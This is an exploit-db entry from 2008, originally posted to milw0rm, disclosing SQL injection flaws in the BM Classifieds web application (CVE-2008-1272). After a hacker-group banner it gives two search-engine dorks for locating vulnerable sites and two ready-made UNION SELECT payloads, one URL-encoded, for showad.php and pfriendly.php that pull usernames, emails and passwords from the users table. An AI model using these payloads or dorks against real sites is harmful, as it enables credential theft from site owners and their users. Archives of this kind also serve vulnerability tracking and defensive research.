Lucene search
XcorpitxEDB-ID:5223HistoryMar 09, 2008 - 12:00 a.m.
BM Classifieds 20080409 - Multiple SQL Injections
2008-03-0900:00:00
xcorpitx
www.exploit-db.com
24
..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
########################### Turkey ####################################
# #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
#Powered by BM Classifieds (listingid),(ad)SQL Injection Vulnerability
#
#######################################################################
#
# AUTHOR : xcorpitx
#
# HOME : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
########################################################################
#
# Dork 1 : ''showad.php?listingid=''
#
# Dork 2 : ''pfriendly.php?ad=''
#
########################################################################
#
# EXPLOIT:
#
########################################################################
#
#
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
#
#
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
#
#
########################################################################
Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin
# milw0rm.com [2008-03-09]Related
prion
prion
Sql injection
2008-03-10 23:44:00
nvd
nvd
CVE-2008-1272
2008-03-10 23:44:00
cvelist
cvelist
CVE-2008-1272
2008-03-10 23:00:00
cve
cve
CVE-2008-1272
2008-03-10 23:44:00